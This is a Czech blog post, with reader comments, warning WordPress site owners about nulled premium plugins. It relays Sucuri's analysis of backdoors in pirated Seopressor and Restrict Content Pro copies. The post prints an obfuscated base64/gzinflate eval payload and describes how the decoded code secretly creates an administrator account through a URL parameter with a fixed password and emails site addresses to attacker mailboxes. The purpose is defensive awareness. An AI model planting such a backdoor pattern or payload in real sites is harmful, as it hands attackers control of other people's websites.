Riziko při použití free a nulled premium pluginů

Přestože je pro WordPress řada free pluginů, prémiové pluginy často nabízí funkčnost, které pluginy zdarma nemají. A určitě jste již narazili na weby, kde se dají stáhnout zdarma.

Podobné weby, je nabízí pod označením nulled, což znamená zrušenou kontrolu, či ochranu licence. Stačí do Google zadat „<nazev pluginu> free download“ a najdete celou řadu stránek, kde je stáhnete. Tento článek však nemá být návodem, jak najít podobné weby, právě naopak.

Samozřejmě, že získat něco hodnotného zdarma, může být lákavé, ale zároveň si musíte položit otázku, proč vám vlastně majitelé těchto webů, pluginy „nezištně“ nabízí?

Odpověď je jednoduchá – jejich motivací je zisk. Často si totiž instalací šablony, nebo pluginu, který byl v podstatě ukraden, přidáte do vašeho webu nevítaná zadní vrátka a do systému se vám dostane nepovolaná osoba.

Ukážeme si několik případů, které na svém blogu zveřejnila firma Sucuri v článku „Unmasking free premium WordPress plugin„.

Seopressor

Tento plugin je možné pořídit za 47 dolarů, tedy za cca 500 korun. Při kontrole zdrojových souborů byl v souboru central.class.php nalezen následující kód.

eval (gzinflate( base64 _decode("NdLJlmNQAADQX8muqo6FIKZTXV0HEUKixCybPsIzBOGZHu/ruzf9B3dxd9+/f333Zb8DS9Ls3gtcvfImmcD7IxkBd/
iTgbTLwPublZ2MEZ6RJB1vkD/yYYV8OdYhuTCXwq+1882AVrOXpUJzbr507gkxWLZRYOfc5llCsyRMdIZxv+sW6N0ICq6h6Bm/
5us1pVADcjlCnsm5tttpIWyHnzkwyMqVJTOupEbLBCE50lcVtKnLKc999/JlZDWRcO8yqve1TKRiND7ZXnsJBW5L0zwJVuFQMQmXgTPLNZnw/PCObVCZ+YO56TOih0TzlIvhqgqpH+jUUgfVXVFrVPDRk6eKdDL1aNQgr2J5wB5Z0GErnQ3muWGF6ktS9a27sYinLuRjpUrQK6GktGCw+pMNqVq84FQCnQBKqUw3vjvT6B8ZyJAgDuEcimHia1660nhruAX71qNCOBjmvMw9q6DN4ukIgufPUyQNmX9ao1YPak6p96OGzSZoj86NPlkXEWnUvSBQzJouKDYxdsKoOTDeA3sxP17dWfxxs4S8HyeWkcYWsmMYieaS2TVR0RfOgw2Xygbrv6I03xIkKlQNfGUTmj4wsOgQdvailUayKYpaL8EVwG1aJTgcMufcgbogTeEAtf1pXp6EzYiru0XYPkcCT/I6+vp623187D4+d/+L/QU=" )) );

Osobně, pokud na podobný kód v pluginu narazím a není takový plugin pro mne nezbytný, okamžitě jej odstraním. Ani nepátrám po tom, co zakódovaná část obsahuje, vzhledem k tomu, že si nikdy nemohu být jist, co obsahuje. I kdyby to byl neškodný kód, který zakódoval developer, aby mu někdo neokopíroval jeho práci, má u mne smůlu. V oficiálním repositáři by se pluginy s podobně zakódovanou částí, neměly vyskytovat.
Ale zpět k nalezenému kódu. Když jej v Sucuri rozkódovali, zobrazily se tyto dvě funkce:

Čtěte  Obrázkový kód pro přihlášení administrátora

wordpress-thomasza-gmx-com

Obě funkce jsou zavěšeny do hooku wp_head.
První, vytvoří uživatele wordpress, s administrátorskými právy, pokud zavoláte url, která bude mít na konci „?cms=jjoplmh“.
Druhá funkce zkontroluje, zda existuje uživatel wordpress a pokud ne, odešle informaci o webu na email thomasza@gmx.com.

Shrnutí: stáhnete si nulled plugin, po nainstalování odešle funkce url vašeho webu na email thomasza@gmx.com, útočník zadá do prohlížeče www.vasweb.cz/?cms=jjoplmh a tím si vytvoří uživatele wordpress s heslem gh67io9Cjm a právy administrátora.

Restrict Content Pro

V tomto pluginu byl nejprve nalezen soubor sidebar.php, ve složce includes. Jeho velikost byla 72 847 bytů a kód vypadal jako zakomentované formuláře pro option pluginu. Pokud si kód projdete – odkaz, někde uprostřed, najdete nezakomentovanou část kódu, která vypadá obdobně, jako v předchozím příkladu:

wordpress-plugin-backdoor

Útočník se snaží zamezit detekci zakódovaného řetězce, pomocí nějakého nástroje a zároveň se snaží, aby byl kód při vizuální kontrole přehlédnut. Přesto obsahuje zakódovanou část, která nám po dekódování vrátí email wordpressslog@yandex.com. Funkce, stejně jako v minulém případě odesílá email s informací o url webu.
Nyní nám schází ještě druhá funkce, která vytvoří uživatele s admin právy. Byla nalezena v souboru class.php, maskovaná stejným způsobem.
rogue-wordpress-administrator
Protože samy o sobě, jsou takto funkce neškodné, útočník pozměnil hlavní soubor pluginu, kam přidal do kódu:

include'includes/class.php'; include'includes/sidebar.php';

Tím je vše propojeno a váš web může být lehce ovládnut a využit.

Čtěte  Plugin Custom Content Type Manager obsahuje backdoor

Dá se říci, že tento problém nevznikne, pokud nebudete používat „ukradené“ pluginy, nebo šablony. Bohužel, často jsou rizika podceňována, nebo se stránka tváří natolik důvěryhodně, že neznalého uživatele zmate. Proto, pokud máte podezření na škodlivý kód na webu, použijte některý z pluginů v tomto článku 5 pluginů pro detekci malware ve WordPress.

About The Author

Zajímá mne Wordpress, responsivní šablony a zkrátka vše kolem tohoto skvělého redakčního systému.

Related posts

4 Comments

  1. Milan

    Bohužel mam s tímto také zkušenosti. Stáhnul jsem jednou premiovou šablonu, nechal si jí upravit a pak nahodil na web. 4 měsíce běže vše bez nejmenšího problému. Liboval jsem si, jak jsem ušetřil. Pak ze dne na den bylo po. Stránka se začínala načítat desítky vteřin a ve GWT pak byli vidět strán jako /texas-holdem-poker, /lucky-7, /slot-machines apod. Tyto stránky samozřejme neměly s webem co dočinění a byli tam vytvořeny právě někým jiným, naprosto tiše a nepozorovaně. Řešení bylo nakonec takové, že jsem web musel kompletně smazat, šablonu si koupit a vše znova upravit. Co z toho plyne? Nekraďte šablony a radši za ně těch pár stovek dejte. Za ty problémy to nestojí.

    Reply
  2. Patrik

    On to není problém jen pluginů, ale bohužel i tzv. free premium šablon, které lze stahovat z pofidérních zdrojů a které již obsahují škodlivé kódy.

    Reply
  3. Petr

    Zdravím,
    vídím, že tuto stránku navštěvují odborníci a proto se na Vás obracím s prosbou ohledně bezpečnosti a fukčnosti webu. Na našem webu máme připraven rezervační systém / WPBOOKING CALENDAR /. Běží vše skvěle. Rezervace na ubytování jsou zadávány recepční, já si mohu prohlédnout rezervace na cestách apod. Mám však dva dotazy:
    1. Recepční má plugin stále puštěn, třeba celý den – není web pro návštěvníky omezován, zpomalován její činností?
    2, Je bezpečně aby měli recepční hesla do wordpressu? / nelze striktně omezit práva /.
    Řešením se zdá být nová doména třetího řádu recepce.xxx.cz.

    Myslíte si, že je to rozumné řešení nebo to nic neřeší.

    Děkuji a chválím za úžasný web / čtu více než noviny / :)

    Reply
    1. Musilda

      1. Na činnost webu by to nemělo mít vliv.
      2. To je otázka lidského faktoru, čím více lidí má přístup do administrace, tím větší je šance, že něco nedopatřením změní.

      Reply

Leave a Reply

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *